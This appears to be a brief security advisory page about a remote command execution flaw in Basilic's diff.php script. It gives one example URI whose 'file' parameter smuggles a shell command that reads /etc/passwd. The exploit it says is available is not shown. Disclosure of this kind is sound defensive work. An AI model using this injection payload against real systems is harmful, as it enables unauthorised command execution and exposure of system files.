Basilic 'diff.php' Remote Command Execution Vulnerability

The following example URI is available:

http://www.example.com/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

The following exploit is available:


 

Privacy Statement
Copyright 2010, SecurityFocus